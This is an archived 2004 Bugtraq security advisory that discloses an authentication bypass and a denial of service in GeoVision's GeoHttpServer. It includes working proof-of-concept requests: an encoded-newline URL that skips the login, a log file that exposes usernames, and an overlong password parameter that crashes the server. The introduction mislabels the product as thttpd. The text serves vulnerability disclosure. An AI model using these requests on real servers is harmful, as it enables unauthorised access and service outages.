GeoHttpServer Authentification Bypass Vulnerability & D.O.S (Denial Of Service)

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/22/04

  • Next message: Steve G: "Re: Re[2]: Hijacking Apache 2 via mod_perl"
    To: "bugtraq" <bugtraq@securityfocus.com>
    Date: Thu, 22 Jan 2004 19:23:16 +0200
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Software: GeoHttpServer
    Vendor: GEOVISION INC
                            http://www.geovision.com.tw
    Versions: ALL
    Platforms: Unix
    Bug: Authentification Bypass Vulnerability & D.O.S (Denial
    Of Service)
    Risk: High
    Exploitation: Remote with browser
    Date: 22 Jan 2004
    Author: Rafel Ivgi, The-Insider
    e-mail: the_insider@mail.com
    web: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bug
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    thttpd is a free "Open Source" webserver that comes by default with unix
    systems such as
    FREEBSD and Linux.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    The GeoHttpServer Security is pretty good. Some users, who understand what
    they are doing configure the server to authentificate login attempts.

    The server uses this authentification code:
    **********************************************
    <html><head><title>Login In</title>
    </head><body><center>
    <form method="POST" action="phoneinfo">User Name:</BR>
      <input type="id" name="id" size="10"><p></p>
      Password:</BR>
      <input type="password" name="pwd" size="10">
      <p><input type="radio" name="ImageType" value="1" checked>JPEG&nbsp;
      <input type="radio" name="ImageType" value="2">GIF</p>
      <p><input type="submit" name="send" value="Submit"><input type="reset"
    name="CANCEL" value="Cancel"></center><center><br>
      </p>
    </form>
    </center>
    </body>
    </html>
    **********************************************

    Amazingly - http://>/%0a%0a Bypasses it!
    You get the GeoHttpServer default Main Page.

    Now the main page leads to functions that also require authentifiaction,
    In order to retrieve a user name we can go to
    http://>/logfile.txt
    Which generally contains the last logins and usernames.
    In most cases the password will be the same as the user.

    In addition there is an authentification form inside the server that
    requires a name and
    a password in order to see the server info/config.
    Manipulating this links can cause Denial Of service of the server.

    P.O.C(Proof Of Concept):
    http://>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaa

    Another D.O.S caused by the server is an Internet Explorer D.O.S when
    someone is watching
    video stream from the server and presses the reconnect button, I.E has an
    overflow.
    Internet Explorer Version: 6.0.2600.0
    Module Stuck: msxml3.dll
    Module Version: 8.20.9415.0
    Offset: 00013ed6

    http://theinsider.deep-ice.com/

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    Authentification Bypass - http://>/%0a%0a Bypasses it!
    Denial Of Service -
    http://>/sysinfo?id=TheInsider&pwd=killedaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaa

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com
    "Things that are unlikeable, are NOT impossible."
    

  • Next message: Steve G: "Re: Re[2]: Hijacking Apache 2 via mod_perl"

    Relevant Pages

    • Re: Problem with Xserver and Gnome applications
      ... The program 'gedit' received an X Window System error. ... This probably reflects a bug in the program. ... request belongs to an X11 extension. ... server does not support that extension and gedit doesn't check for it ...
      (comp.sys.sgi.admin)
    • Re: bug in java.net.Socket??
      ... I've been trying to get a passive ftp server working, but unfortunately, ... there seems to be a VERY low level bug in the Socket command that makes ... server is already serving a connection new connection attempts are ... Now I don't know for sure, but I STRONGLY suspect that it is a java bug. ...
      (comp.lang.java.programmer)
    • Re: bug in time() related to DST?
      ... closes that short window of DST transition. ... > an indication of what the bug in my code is. ... > The servers are running Win2000 Server. ... > The call to GetLocalTimewill have the correct time and the time ...
      (microsoft.public.vc.language)
    • Re: Failed to map the path /App_GlobalResources/
      ... Have you also tested on other server to see whether you'll encounter the ... is this the first time you try deploying 2.0 website on ... |> | If not, install it, and check to see whether the bug remains. ...
      (microsoft.public.dotnet.framework.aspnet)
    • 5 bugs
      ... Don't confuse with Apacheweb server. ... Bug founded in function $exists. ... If you want to use this function (play sound-requests), ...
      (Bugtraq)